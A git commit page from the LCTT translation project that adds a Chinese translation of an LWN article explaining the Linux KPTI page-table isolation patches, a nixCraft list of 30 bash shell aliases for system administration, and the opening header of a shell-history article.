mirror of
https://github.com/LCTT/TranslateProject.git
synced 2025-03-21 02:10:11 +08:00
Merge remote-tracking branch 'upstream/master'
This commit is contained in:
commit
ef7efe2323
@ -0,0 +1,54 @@
|
||||
KPTI:内核页表隔离的当前的发展
|
||||
============================================================
|
||||
|
||||
在十月底的时候,[KAISER][8] 补丁集被披露了;它做了一项工作,将内核空间与用户空间使用的<ruby>页表<rt>page tables</rt></ruby>进行了隔离,以解决 x86 处理器上向攻击者透露内核布局的安全漏洞。这些补丁是自它们被公布以来,这一星期中最值关注的事情,但是,它们似乎正在接近最终的状态。这应该是再次审视它们的合适机会。
|
||||
|
||||
这项工作被重命名为 “<ruby>内核页表隔离<rt>kernel page-table isolation</rt></ruby>” (KPTI),但是目的是一样的:分割页表,将现在被用户空间和内核空间共享使用的这张表分成两套,内核空间和用户空间各自使用一个。这对内核的内存管理产生了根本性的变化,并且,这也是这些年来为此问题进行争论的人所希望看到的,尤其是考虑到它的性能影响的时候。不过,KPTI 仍然处于快速发展的轨道上。[一组预备补丁][2] 已被被合并到 4.15 - rc4 之后的主版本线上了 — 一般情况下仅重要的修复才被允许这样做 — 并且其余的似乎被确定进入 4.16 版的合并窗口中。许多内核开发者都在这项工作上投入了大量的时间,并且 Linus Torvalds [要求][3] 将这项工作回迁到长期稳定内核中。
|
||||
|
||||
也就是说,KPTI 已经在最后期限的压力下安全补丁的所有标记都已经就绪了。对于任何基于 ARM 的读者,在这里值的注意的是,在这项工作中有一个 [为 arm64 的等效补丁集][4]。
|
||||
|
||||
### 51 个补丁乃至更多
|
||||
|
||||
在这篇文章中,x86 补丁系统在 [163 版本][5]。它包含 51 个补丁,因此,我们应该感谢那些没有公开的版本。最初的补丁集,由 Dave Hansen 发布,由 Thomas Gleixner、Peter Zijlstra、Andy Lutomirski、和 Hugh Dickins 根据许多其它人的建议,做了大量的修订。任何还存在于这项工作中的错误都不会是由于代码方面缺乏经验导致的。
|
||||
|
||||
在现代系统中,页表是以一个树形结构进行组织的,这样可以高效地存储稀疏内存映射和支持巨页特性;查看[这篇 2005 年的文章][6] 了解更多细节以及它是怎么工作的示意图。在一个有四级页面表的系统上(目前的大多数大型系统都是这样),顶级是页面全局目录(PGD)。紧接着是页面上层目录(PUD)、页面中层目录(PMD)和页面表条目(PTE)。有五级页面表的系统是在 PGD 下面插入了一层(称为 P4D)。
|
||||
|
||||
页面故障解析通常遍历整个树去查找所需的 PTE,但是,巨页可以被更高层级的特定条目所表示。例如,一个 2MB 的内存<ruby>块<rt>chunk</rt></ruby>既可以由 PMD 层级的一个单个的巨页条目表示,也可以由一个单页 PTE 条目的完整页面表示。
|
||||
|
||||
在当前的内核中,每个处理器有一个单个的 PGD;在 KPTI 系列补丁中所采取的第一步的其中一个措施是,去创建一个第二个 PGD。当内核运行时,原来的仍然在使用;它映射所有的地址空间。当处理器运行在用户空间时,(在打完该系列补丁之后)第二个被激活。它指向属于该进程的页面的相同目录层次,但是,描述内核空间(位于虚拟地址空间的顶端)的部分通常都不在这里。
|
||||
|
||||
页表条目包含权限描述位,它记录了内存该如何被访问;不用说都知道,这些位是用来设置阻止用户空间访问内核页面的,即便是通过那些被映射到该地址空间的页面访问。不幸的是,一些硬件级的错误允许用户空间的攻击者去确定一个给定的内核空间地址是否被映射,而不管那个页面上映射的地址是否被允许访问。而那个信息可以被用于击败内核地址空间布局随机化,可以使一个本地的攻击者更易于得逞。在 KPTI 背后的核心思想是,切换到一个没有内核空间映射的 PGD,将会使基于这个漏洞的攻击失效,而到现在为止,我们还没有看到这些攻击。
|
||||
|
||||
### 细节
|
||||
|
||||
这个想法很简单,但是,就像经常发生的那样,有很多麻烦的细节,这个简单的想法变成了一个 51 个部分的系列补丁。最初的问题是,如果处理器在用户模式运行时响应一个硬件中断,处理中断需要的内核代码将在地址空间中不存在。因此,必须有足够的内核代码映射在用户模式中,以能够切换回到内核 PGD,使剩余的代码也可用。对于 traps、非屏蔽中断、和系统调用,也存在一个相似的情况。这个代码很小而且可以与其它部分隔离,但是,在处理安全且有效地切换时,涉及到一些很复杂的细节。
|
||||
|
||||
另一个难题来自 x86 本地描述符表(LDT)的构成,它可以被用于去改变用户空间的内存布局。它可以使用鲜为人知的 [`modify_ldt()`][7] 系统调用来做微调。例如,在 Linux 上早期的 POSIX 线程实现,使用了 LDT 去创建一个本地线程存储区域。在现在的 Linux 系统上,LDT 几乎不再使用了,但是,一些应用程序(比如,Wine)仍然需要它。当它被使用时,LDT 必须能够被用户空间和内核空间都可以访问到,但是,它必须一直处于内核空间中。KPTI 补丁集清理内核附近的内存,在 PGD 级别上为 LDT 保留一个完全的条目;因此,`vmalloc()` 调用的可用空间收缩到仅有 12,800TB。那是一个非常巨大的 LDT 空间数,可以满足有很多 CPU 的系统需要。这种变化的其中一个结果是,LDT 的位置是固定的,并且已知道用户空间 — 一个潜在的问题是,因此可以通过覆写 LDT 来很容易地破坏整个系统。在这个系列的最终的补丁是映射为只读 LDT,以阻止此类攻击。
|
||||
|
||||
另一个潜在的漏洞是,如果内核一直可以被操纵返回到用户空间而无需切换到已净化的 PGD。因为内核空间 PGD 也映射用户空间内存,这种疏忽可能被忽视一段时间。对此的响应是将用户空间的虚拟地址部分映射为内核 PGD 的非可执行部分。用户空间使用了一个错误的页面表来开始运行,将会立即崩溃。
|
||||
|
||||
最后,虽然所有已存在的 x86 处理器似乎都会受到已经披露的漏洞信息的影响,但是,以后的处理器可能不会受此影响。KPTI 有一个可测量的运行时成本,估计在 5%。这个成本不应该由用户去承担,尤其是他们拿到了没有这个问题的新处理器时。将会有一个 `nopti` 内核命令行选项,可以在机器引导时去禁用它。这个补丁系列也增加了一个新的“特性”标识(`X86_BUG_CPU_INSECURE`)去标识有漏洞的 CPU;它被设置现在的所有 x86 CPU 上,但是在以后的硬件上可能没有。如果没有该特性标识,页面隔离将自动被关闭。
|
||||
|
||||
在 4.16 版的合并窗口打开之前剩下将近一个月。在这段时间里,KPTI 补丁集毫无疑问将通过一些更多的修改来解决一些必然的小问题。一旦稳定之后,这些代码将被合并,并且将会尽快回迁到稳定内核。显然,我们期待一个缓慢更新的 — 但是更安全的 — 内核,作为我们的新年礼物。
|
||||
|
||||
--------------------------------------------------------------------------------
|
||||
|
||||
via: https://lwn.net/SubscriberLink/741878/eb6c9d3913d7cb2b/
|
||||
|
||||
作者:[Jonathan Corbet][a]
|
||||
译者:[qhwdw](https://github.com/qhwdw)
|
||||
校对:[wxy](https://github.com/wxy)
|
||||
|
||||
本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
|
||||
|
||||
[a]:https://lwn.net/SubscriberLink/741878/eb6c9d3913d7cb2b/
|
||||
[1]:https://lwn.net/Promo/slink-trial2-2/claim
|
||||
[2]:https://git.kernel.org/linus/64a48099b3b31568ac45716b7fafcb74a0c2fcfe
|
||||
[3]:https://lwn.net/Articles/741882/
|
||||
[4]:https://lwn.net/Articles/740393/
|
||||
[5]:https://lwn.net/Articles/741883/
|
||||
[6]:https://lwn.net/Articles/117749/
|
||||
[7]:http://man7.org/linux/man-pages/man2/modify_ldt.2.html
|
||||
[8]:https://lwn.net/Articles/738975/
|
||||
|
||||
|
@ -0,0 +1,541 @@
|
||||
translating by lujun9972
|
||||
30 Handy Bash Shell Aliases For Linux / Unix / Mac OS X
|
||||
======
|
||||
An bash alias is nothing but the shortcut to commands. The alias command allows the user to launch any command or group of commands (including options and filenames) by entering a single word. Use alias command to display a list of all defined aliases. You can add user-defined aliases to [~/.bashrc][1] file. You can cut down typing time with these aliases, work smartly, and increase productivity at the command prompt.
|
||||
|
||||
This post shows how to create and use aliases including 30 practical examples of bash shell aliases.
|
||||
[![30 Useful Bash Shell Aliase For Linux/Unix Users][2]][2]
|
||||
|
||||
## More about bash alias
|
||||
|
||||
The general syntax for the alias command for the bash shell is as follows:
|
||||
|
||||
### How to list bash aliases
|
||||
|
||||
Type the following [alias command][3]:
|
||||
`alias`
|
||||
Sample outputs:
|
||||
```
|
||||
alias ..='cd ..'
|
||||
alias amazonbackup='s3backup'
|
||||
alias apt-get='sudo apt-get'
|
||||
...
|
||||
|
||||
```
|
||||
|
||||
By default alias command shows a list of aliases that are defined for the current user.
|
||||
|
||||
### How to define or create a bash shell alias
|
||||
|
||||
To [create the alias][4] use the following syntax:
|
||||
```
|
||||
alias name =value
|
||||
alias name = 'command'
|
||||
alias name = 'command arg1 arg2'
|
||||
alias name = '/path/to/script'
|
||||
alias name = '/path/to/script.pl arg1'
|
||||
```
|
||||
|
||||
alias name=value alias name='command' alias name='command arg1 arg2' alias name='/path/to/script' alias name='/path/to/script.pl arg1'
|
||||
|
||||
In this example, create the alias **c** for the commonly used clear command, which clears the screen, by typing the following command and then pressing the ENTER key:
|
||||
```
|
||||
alias c = 'clear'
|
||||
```
|
||||
|
||||
|
||||
Then, to clear the screen, instead of typing clear, you would only have to type the letter 'c' and press the [ENTER] key:
|
||||
```
|
||||
c
|
||||
```
|
||||
|
||||
### How to disable a bash alias temporarily
|
||||
|
||||
An [alias can be disabled temporarily][5] using the following syntax:
|
||||
```
|
||||
## path/to/full/command
|
||||
/usr/bin/clear
|
||||
## call alias with a backslash ##
|
||||
\c
|
||||
## use /bin/ls command and avoid ls alias ##
|
||||
command ls
|
||||
```
|
||||
|
||||
### How to delete/remove a bash alias
|
||||
|
||||
You need to use the command [called unalias to remove aliases][6]. Its syntax is as follows:
|
||||
```
|
||||
unalias aliasname
|
||||
unalias foo
|
||||
```
|
||||
|
||||
In this example, remove the alias c which was created in an earlier example:
|
||||
```
|
||||
unalias c
|
||||
```
|
||||
|
||||
You also need to delete the alias from the [~/.bashrc file][1] using a text editor (see next section).
|
||||
|
||||
The alias c remains in effect only during the current login session. Once you logs out or reboot the system the alias c will be gone. To avoid this problem, add alias to your [~/.bashrc file][1], enter:
|
||||
```
|
||||
vi ~/.bashrc
|
||||
```
|
||||
|
||||
|
||||
The alias c for the current user can be made permanent by entering the following line:
|
||||
```
|
||||
alias c = 'clear'
|
||||
```
|
||||
|
||||
Save and close the file. System-wide aliases (i.e. aliases for all users) can be put in the /etc/bashrc file. Please note that the alias command is built into a various shells including ksh, tcsh/csh, ash, bash and others.
|
||||
|
||||
### A note about privileged access
|
||||
|
||||
You can add code as follows in ~/.bashrc:
|
||||
```
|
||||
# if user is not root, pass all commands via sudo #
|
||||
if [ $UID -ne 0 ]; then
|
||||
alias reboot='sudo reboot'
|
||||
alias update='sudo apt-get upgrade'
|
||||
fi
|
||||
```
|
||||
|
||||
### A note about os specific aliases
|
||||
|
||||
You can add code as follows in ~/.bashrc [using the case statement][7]:
|
||||
```
|
||||
### Get os name via uname ###
|
||||
_myos="$(uname)"
|
||||
|
||||
### add alias as per os using $_myos ###
|
||||
case $_myos in
|
||||
Linux) alias foo='/path/to/linux/bin/foo';;
|
||||
FreeBSD|OpenBSD) alias foo='/path/to/bsd/bin/foo' ;;
|
||||
SunOS) alias foo='/path/to/sunos/bin/foo' ;;
|
||||
*) ;;
|
||||
esac
|
||||
```
|
||||
|
||||
## 30 bash shell aliases examples
|
||||
|
||||
You can define various types aliases as follows to save time and increase productivity.
|
||||
|
||||
### #1: Control ls command output
|
||||
|
||||
The [ls command lists directory contents][8] and you can colorize the output:
|
||||
```
|
||||
## Colorize the ls output ##
|
||||
alias ls = 'ls --color=auto'
|
||||
|
||||
## Use a long listing format ##
|
||||
alias ll = 'ls -la'
|
||||
|
||||
## Show hidden files ##
|
||||
alias l.= 'ls -d . .. .git .gitignore .gitmodules .travis.yml --color=auto'
|
||||
```
|
||||
|
||||
### #2: Control cd command behavior
|
||||
```
|
||||
## get rid of command not found ##
|
||||
alias cd..= 'cd ..'
|
||||
|
||||
## a quick way to get out of current directory ##
|
||||
alias ..= 'cd ..'
|
||||
alias ...= 'cd ../../../'
|
||||
alias ....= 'cd ../../../../'
|
||||
alias .....= 'cd ../../../../'
|
||||
alias .4= 'cd ../../../../'
|
||||
alias .5= 'cd ../../../../..'
|
||||
```
|
||||
|
||||
### #3: Control grep command output
|
||||
|
||||
[grep command is a command-line utility for searching][9] plain-text files for lines matching a regular expression:
|
||||
```
|
||||
## Colorize the grep command output for ease of use (good for log files)##
|
||||
alias grep = 'grep --color=auto'
|
||||
alias egrep = 'egrep --color=auto'
|
||||
alias fgrep = 'fgrep --color=auto'
|
||||
```
|
||||
|
||||
### #4: Start calculator with math support
|
||||
```
|
||||
alias bc = 'bc -l'
|
||||
```
|
||||
|
||||
### #4: Generate sha1 digest
|
||||
```
|
||||
alias sha1 = 'openssl sha1'
|
||||
```
|
||||
|
||||
### #5: Create parent directories on demand
|
||||
|
||||
[mkdir command][10] is used to create a directory:
|
||||
```
|
||||
alias mkdir = 'mkdir -pv'
|
||||
```
|
||||
|
||||
### #6: Colorize diff output
|
||||
|
||||
You can [compare files line by line using diff][11] and use a tool called colordiff to colorize diff output:
|
||||
```
|
||||
# install colordiff package :)
|
||||
alias diff = 'colordiff'
|
||||
```
|
||||
|
||||
### #7: Make mount command output pretty and human readable format
|
||||
```
|
||||
alias mount = 'mount |column -t'
|
||||
```
|
||||
|
||||
### #8: Command short cuts to save time
|
||||
```
|
||||
# handy short cuts #
|
||||
alias h = 'history'
|
||||
alias j = 'jobs -l'
|
||||
```
|
||||
|
||||
### #9: Create a new set of commands
|
||||
```
|
||||
alias path = 'echo -e ${PATH//:/\\n}'
|
||||
alias now = 'date +"%T"'
|
||||
alias nowtime =now
|
||||
alias nowdate = 'date +"%d-%m-%Y"'
|
||||
```
|
||||
|
||||
### #10: Set vim as default
|
||||
```
|
||||
alias vi = vim
|
||||
alias svi = 'sudo vi'
|
||||
alias vis = 'vim "+set si"'
|
||||
alias edit = 'vim'
|
||||
```
|
||||
|
||||
### #11: Control output of networking tool called ping
|
||||
```
|
||||
# Stop after sending count ECHO_REQUEST packets #
|
||||
alias ping = 'ping -c 5'
|
||||
|
||||
# Do not wait interval 1 second, go fast #
|
||||
alias fastping = 'ping -c 100 -s.2'
|
||||
```
|
||||
|
||||
### #12: Show open ports
|
||||
|
||||
Use [netstat command][12] to quickly list all TCP/UDP port on the server:
|
||||
```
|
||||
alias ports = 'netstat -tulanp'
|
||||
```
|
||||
|
||||
### #13: Wakeup sleeping servers
|
||||
|
||||
[Wake-on-LAN (WOL) is an Ethernet networking][13] standard that allows a server to be turned on by a network message. You can [quickly wakeup nas devices][14] and server using the following aliases:
|
||||
```
|
||||
## replace mac with your actual server mac address #
|
||||
alias wakeupnas01 = '/usr/bin/wakeonlan 00:11:32:11:15:FC'
|
||||
alias wakeupnas02 = '/usr/bin/wakeonlan 00:11:32:11:15:FD'
|
||||
alias wakeupnas03 = '/usr/bin/wakeonlan 00:11:32:11:15:FE'
|
||||
```
|
||||
|
||||
### #14: Control firewall (iptables) output
|
||||
|
||||
[Netfilter is a host-based firewall][15] for Linux operating systems. It is included as part of the Linux distribution and it is activated by default. This [post list most common iptables solutions][16] required by a new Linux user to secure his or her Linux operating system from intruders.
|
||||
```
|
||||
## shortcut for iptables and pass it via sudo#
|
||||
alias ipt = 'sudo /sbin/iptables'
|
||||
|
||||
# display all rules #
|
||||
alias iptlist = 'sudo /sbin/iptables -L -n -v --line-numbers'
|
||||
alias iptlistin = 'sudo /sbin/iptables -L INPUT -n -v --line-numbers'
|
||||
alias iptlistout = 'sudo /sbin/iptables -L OUTPUT -n -v --line-numbers'
|
||||
alias iptlistfw = 'sudo /sbin/iptables -L FORWARD -n -v --line-numbers'
|
||||
alias firewall =iptlist
|
||||
```
|
||||
|
||||
### #15: Debug web server / cdn problems with curl
|
||||
```
|
||||
# get web server headers #
|
||||
alias header = 'curl -I'
|
||||
|
||||
# find out if remote server supports gzip / mod_deflate or not #
|
||||
alias headerc = 'curl -I --compress'
|
||||
```
|
||||
|
||||
### #16: Add safety nets
|
||||
```
|
||||
# do not delete / or prompt if deleting more than 3 files at a time #
|
||||
alias rm = 'rm -I --preserve-root'
|
||||
|
||||
# confirmation #
|
||||
alias mv = 'mv -i'
|
||||
alias cp = 'cp -i'
|
||||
alias ln = 'ln -i'
|
||||
|
||||
# Parenting changing perms on / #
|
||||
alias chown = 'chown --preserve-root'
|
||||
alias chmod = 'chmod --preserve-root'
|
||||
alias chgrp = 'chgrp --preserve-root'
|
||||
```
|
||||
|
||||
### #17: Update Debian Linux server
|
||||
|
||||
[apt-get command][17] is used for installing packages over the internet (ftp or http). You can also upgrade all packages in a single operations:
|
||||
```
|
||||
# distro specific - Debian / Ubuntu and friends #
|
||||
# install with apt-get
|
||||
alias apt-get= "sudo apt-get"
|
||||
alias updatey = "sudo apt-get --yes"
|
||||
|
||||
# update on one command
|
||||
alias update = 'sudo apt-get update && sudo apt-get upgrade'
|
||||
```
|
||||
|
||||
### #18: Update RHEL / CentOS / Fedora Linux server
|
||||
|
||||
[yum command][18] is a package management tool for RHEL / CentOS / Fedora Linux and friends:
|
||||
```
|
||||
## distrp specifc RHEL/CentOS ##
|
||||
alias update = 'yum update'
|
||||
alias updatey = 'yum -y update'
|
||||
```
|
||||
|
||||
### #19: Tune sudo and su
|
||||
```
|
||||
# become root #
|
||||
alias root = 'sudo -i'
|
||||
alias su = 'sudo -i'
|
||||
```
|
||||
|
||||
### #20: Pass halt/reboot via sudo
|
||||
|
||||
[shutdown command][19] bring the Linux / Unix system down:
|
||||
```
|
||||
# reboot / halt / poweroff
|
||||
alias reboot = 'sudo /sbin/reboot'
|
||||
alias poweroff = 'sudo /sbin/poweroff'
|
||||
alias halt = 'sudo /sbin/halt'
|
||||
alias shutdown = 'sudo /sbin/shutdown'
|
||||
```
|
||||
|
||||
### #21: Control web servers
|
||||
```
|
||||
# also pass it via sudo so whoever is admin can reload it without calling you #
|
||||
alias nginxreload = 'sudo /usr/local/nginx/sbin/nginx -s reload'
|
||||
alias nginxtest = 'sudo /usr/local/nginx/sbin/nginx -t'
|
||||
alias lightyload = 'sudo /etc/init.d/lighttpd reload'
|
||||
alias lightytest = 'sudo /usr/sbin/lighttpd -f /etc/lighttpd/lighttpd.conf -t'
|
||||
alias httpdreload = 'sudo /usr/sbin/apachectl -k graceful'
|
||||
alias httpdtest = 'sudo /usr/sbin/apachectl -t && /usr/sbin/apachectl -t -D DUMP_VHOSTS'
|
||||
```
|
||||
|
||||
### #22: Alias into our backup stuff
|
||||
```
|
||||
# if cron fails or if you want backup on demand just run these commands #
|
||||
# again pass it via sudo so whoever is in admin group can start the job #
|
||||
# Backup scripts #
|
||||
alias backup = 'sudo /home/scripts/admin/scripts/backup/wrapper.backup.sh --type local --taget /raid1/backups'
|
||||
alias nasbackup = 'sudo /home/scripts/admin/scripts/backup/wrapper.backup.sh --type nas --target nas01'
|
||||
alias s3backup = 'sudo /home/scripts/admin/scripts/backup/wrapper.backup.sh --type nas --target nas01 --auth /home/scripts/admin/.authdata/amazon.keys'
|
||||
alias rsnapshothourly = 'sudo /home/scripts/admin/scripts/backup/wrapper.rsnapshot.sh --type remote --target nas03 --auth /home/scripts/admin/.authdata/ssh.keys --config /home/scripts/admin/scripts/backup/config/adsl.conf'
|
||||
alias rsnapshotdaily = 'sudo /home/scripts/admin/scripts/backup/wrapper.rsnapshot.sh --type remote --target nas03 --auth /home/scripts/admin/.authdata/ssh.keys --config /home/scripts/admin/scripts/backup/config/adsl.conf'
|
||||
alias rsnapshotweekly = 'sudo /home/scripts/admin/scripts/backup/wrapper.rsnapshot.sh --type remote --target nas03 --auth /home/scripts/admin/.authdata/ssh.keys --config /home/scripts/admin/scripts/backup/config/adsl.conf'
|
||||
alias rsnapshotmonthly = 'sudo /home/scripts/admin/scripts/backup/wrapper.rsnapshot.sh --type remote --target nas03 --auth /home/scripts/admin/.authdata/ssh.keys --config /home/scripts/admin/scripts/backup/config/adsl.conf'
|
||||
alias amazonbackup =s3backup
|
||||
```
|
||||
|
||||
### #23: Desktop specific - play avi/mp3 files on demand
|
||||
```
|
||||
## play video files in a current directory ##
|
||||
# cd ~/Download/movie-name
|
||||
# playavi or vlc
|
||||
alias playavi = 'mplayer *.avi'
|
||||
alias vlc = 'vlc *.avi'
|
||||
|
||||
# play all music files from the current directory #
|
||||
alias playwave = 'for i in *.wav; do mplayer "$i"; done'
|
||||
alias playogg = 'for i in *.ogg; do mplayer "$i"; done'
|
||||
alias playmp3 = 'for i in *.mp3; do mplayer "$i"; done'
|
||||
|
||||
# play files from nas devices #
|
||||
alias nplaywave = 'for i in /nas/multimedia/wave/*.wav; do mplayer "$i"; done'
|
||||
alias nplayogg = 'for i in /nas/multimedia/ogg/*.ogg; do mplayer "$i"; done'
|
||||
alias nplaymp3 = 'for i in /nas/multimedia/mp3/*.mp3; do mplayer "$i"; done'
|
||||
|
||||
# shuffle mp3/ogg etc by default #
|
||||
alias music = 'mplayer --shuffle *'
|
||||
```
|
||||
|
||||
|
||||
### #24: Set default interfaces for sys admin related commands
|
||||
|
||||
[vnstat is console-based network][20] traffic monitor. [dnstop is console tool][21] to analyze DNS traffic. [tcptrack and iftop commands displays][22] information about TCP/UDP connections it sees on a network interface and display bandwidth usage on an interface by host respectively.
|
||||
```
|
||||
## All of our servers eth1 is connected to the Internets via vlan / router etc ##
|
||||
alias dnstop = 'dnstop -l 5 eth1'
|
||||
alias vnstat = 'vnstat -i eth1'
|
||||
alias iftop = 'iftop -i eth1'
|
||||
alias tcpdump = 'tcpdump -i eth1'
|
||||
alias ethtool = 'ethtool eth1'
|
||||
|
||||
# work on wlan0 by default #
|
||||
# Only useful for laptop as all servers are without wireless interface
|
||||
alias iwconfig = 'iwconfig wlan0'
|
||||
```
|
||||
|
||||
### #25: Get system memory, cpu usage, and gpu memory info quickly
|
||||
```
|
||||
## pass options to free ##
|
||||
alias meminfo = 'free -m -l -t'
|
||||
|
||||
## get top process eating memory
|
||||
alias psmem = 'ps auxf | sort -nr -k 4'
|
||||
alias psmem10 = 'ps auxf | sort -nr -k 4 | head -10'
|
||||
|
||||
## get top process eating cpu ##
|
||||
alias pscpu = 'ps auxf | sort -nr -k 3'
|
||||
alias pscpu10 = 'ps auxf | sort -nr -k 3 | head -10'
|
||||
|
||||
## Get server cpu info ##
|
||||
alias cpuinfo = 'lscpu'
|
||||
|
||||
## older system use /proc/cpuinfo ##
|
||||
##alias cpuinfo='less /proc/cpuinfo' ##
|
||||
|
||||
## get GPU ram on desktop / laptop##
|
||||
alias gpumeminfo = 'grep -i --color memory /var/log/Xorg.0.log'
|
||||
```
|
||||
|
||||
### #26: Control Home Router
|
||||
|
||||
The curl command can be used to [reboot Linksys routers][23].
|
||||
```
|
||||
# Reboot my home Linksys WAG160N / WAG54 / WAG320 / WAG120N Router / Gateway from *nix.
|
||||
alias rebootlinksys = "curl -u 'admin:my-super-password' 'http://192.168.1.2/setup.cgi?todo=reboot'"
|
||||
|
||||
# Reboot tomato based Asus NT16 wireless bridge
|
||||
alias reboottomato = "ssh admin@192.168.1.1 /sbin/reboot"
|
||||
```
|
||||
|
||||
### #27 Resume wget by default
|
||||
|
||||
The [GNU Wget is a free utility for non-interactive download][25] of files from the Web. It supports HTTP, HTTPS, and FTP protocols, and it can resume downloads too:
|
||||
```
|
||||
## this one saved by butt so many times ##
|
||||
alias wget = 'wget -c'
|
||||
```
|
||||
|
||||
### #28 Use different browser for testing website
|
||||
```
|
||||
## this one saved by butt so many times ##
|
||||
alias ff4 = '/opt/firefox4/firefox'
|
||||
alias ff13 = '/opt/firefox13/firefox'
|
||||
alias chrome = '/opt/google/chrome/chrome'
|
||||
alias opera = '/opt/opera/opera'
|
||||
|
||||
#default ff
|
||||
alias ff =ff13
|
||||
|
||||
#my default browser
|
||||
alias browser =chrome
|
||||
```
|
||||
|
||||
### #29: A note about ssh alias
|
||||
|
||||
Do not create ssh alias, instead use ~/.ssh/config OpenSSH SSH client configuration files. It offers more option. An example:
|
||||
```
|
||||
Host server10
|
||||
Hostname 1.2.3.4
|
||||
IdentityFile ~/backups/.ssh/id_dsa
|
||||
user foobar
|
||||
Port 30000
|
||||
ForwardX11Trusted yes
|
||||
TCPKeepAlive yes
|
||||
```
|
||||
|
||||
Host server10 Hostname 1.2.3.4 IdentityFile ~/backups/.ssh/id_dsa user foobar Port 30000 ForwardX11Trusted yes TCPKeepAlive yes
|
||||
|
||||
You can now connect to peer1 using the following syntax:
|
||||
`$ ssh server10`
|
||||
|
||||
### #30: It's your turn to share…
|
||||
|
||||
```
|
||||
## set some other defaults ##
|
||||
alias df = 'df -H'
|
||||
alias du = 'du -ch'
|
||||
|
||||
# top is atop, just like vi is vim
|
||||
alias top = 'atop'
|
||||
|
||||
## nfsrestart - must be root ##
|
||||
## refresh nfs mount / cache etc for Apache ##
|
||||
alias nfsrestart = 'sync && sleep 2 && /etc/init.d/httpd stop && umount netapp2:/exports/http && sleep 2 && mount -o rw,sync,rsize=32768,wsize=32768,intr,hard,proto=tcp,fsc natapp2:/exports /http/var/www/html && /etc/init.d/httpd start'
|
||||
|
||||
## Memcached server status ##
|
||||
alias mcdstats = '/usr/bin/memcached-tool 10.10.27.11:11211 stats'
|
||||
alias mcdshow = '/usr/bin/memcached-tool 10.10.27.11:11211 display'
|
||||
|
||||
## quickly flush out memcached server ##
|
||||
alias flushmcd = 'echo "flush_all" | nc 10.10.27.11 11211'
|
||||
|
||||
## Remove assets quickly from Akamai / Amazon cdn ##
|
||||
alias cdndel = '/home/scripts/admin/cdn/purge_cdn_cache --profile akamai'
|
||||
alias amzcdndel = '/home/scripts/admin/cdn/purge_cdn_cache --profile amazon'
|
||||
|
||||
## supply list of urls via file or stdin
|
||||
alias cdnmdel = '/home/scripts/admin/cdn/purge_cdn_cache --profile akamai --stdin'
|
||||
alias amzcdnmdel = '/home/scripts/admin/cdn/purge_cdn_cache --profile amazon --stdin'
|
||||
```
|
||||
|
||||
## Conclusion
|
||||
|
||||
This post summarizes several types of uses for *nix bash aliases:
|
||||
|
||||
1. Setting default options for a command (e.g. set eth0 as default option for ethtool command via alias ethtool='ethtool eth0' ).
|
||||
2. Correcting typos (cd.. will act as cd .. via alias cd..='cd ..').
|
||||
3. Reducing the amount of typing.
|
||||
4. Setting the default path of a command that exists in several versions on a system (e.g. GNU/grep is located at /usr/local/bin/grep and Unix grep is located at /bin/grep. To use GNU grep use alias grep='/usr/local/bin/grep' ).
|
||||
5. Adding the safety nets to Unix by making commands interactive by setting default options. (e.g. rm, mv, and other commands).
|
||||
6. Compatibility by creating commands for older operating systems such as MS-DOS or other Unix like operating systems (e.g. alias del=rm ).
|
||||
|
||||
|
||||
|
||||
I've shared my aliases that I used over the years to reduce the need for repetitive command line typing. If you know and use any other bash/ksh/csh aliases that can reduce typing, share below in the comments.
|
||||
|
||||
|
||||
--------------------------------------------------------------------------------
|
||||
|
||||
via: https://www.cyberciti.biz/tips/bash-aliases-mac-centos-linux-unix.html
|
||||
|
||||
作者:[nixCraft][a]
|
||||
译者:[lujun9972](https://github.com/lujun9972)
|
||||
校对:[校对者ID](https://github.com/校对者ID)
|
||||
|
||||
本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
|
||||
|
||||
[a]:https://www.cyberciti.biz
|
||||
[1]:https://bash.cyberciti.biz/guide/~/.bashrc
|
||||
[2]:https://www.cyberciti.biz/tips/wp-content/uploads/2012/06/Getting-Started-With-Bash-Shell-Aliases-For-Linux-Unix.jpg
|
||||
[3]://www.cyberciti.biz/tips/bash-aliases-mac-centos-linux-unix.html (See Linux/Unix alias command examples for more info)
|
||||
[4]:https://bash.cyberciti.biz/guide/Create_and_use_aliases
|
||||
[5]://www.cyberciti.biz/faq/bash-shell-temporarily-disable-an-alias/
|
||||
[6]:https://bash.cyberciti.biz/guide/Create_and_use_aliases#How_do_I_remove_the_alias.3F
|
||||
[7]:https://bash.cyberciti.biz/guide/The_case_statement
|
||||
[8]://www.cyberciti.biz/faq/ls-command-to-examining-the-filesystem/
|
||||
[9]://www.cyberciti.biz/faq/howto-use-grep-command-in-linux-unix/
|
||||
[10]://www.cyberciti.biz/faq/linux-make-directory-command/
|
||||
[11]://www.cyberciti.biz/faq/how-do-i-compare-two-files-under-linux-or-unix/
|
||||
[12]://www.cyberciti.biz/faq/how-do-i-find-out-what-ports-are-listeningopen-on-my-linuxfreebsd-server/
|
||||
[13]://www.cyberciti.biz/tips/linux-send-wake-on-lan-wol-magic-packets.html
|
||||
[14]:https://bash.cyberciti.biz/misc-shell/simple-shell-script-to-wake-up-nas-devices-computers/
|
||||
[15]://www.cyberciti.biz/faq/rhel-fedorta-linux-iptables-firewall-configuration-tutorial/ (iptables CentOS/RHEL/Fedora tutorial)
|
||||
[16]://www.cyberciti.biz/tips/linux-iptables-examples.html
|
||||
[17]://www.cyberciti.biz/tips/linux-debian-package-management-cheat-sheet.html
|
||||
[18]://www.cyberciti.biz/faq/rhel-centos-fedora-linux-yum-command-howto/
|
||||
[19]://www.cyberciti.biz/faq/howto-shutdown-linux/
|
||||
[20]://www.cyberciti.biz/tips/keeping-a-log-of-daily-network-traffic-for-adsl-or-dedicated-remote-linux-box.html
|
||||
[21]://www.cyberciti.biz/faq/dnstop-monitor-bind-dns-server-dns-network-traffic-from-a-shell-prompt/
|
||||
[22]://www.cyberciti.biz/faq/check-network-connection-linux/
|
||||
[23]://www.cyberciti.biz/faq/reboot-linksys-wag160n-wag54-wag320-wag120n-router-gateway/
|
||||
[24]:/cdn-cgi/l/email-protection
|
||||
[25]://www.cyberciti.biz/tips/wget-resume-broken-download.html
|
@ -0,0 +1,150 @@
|
||||
translating by lujun9972
|
||||
How To Display Date And Time In History Command
|
||||
======
|
||||
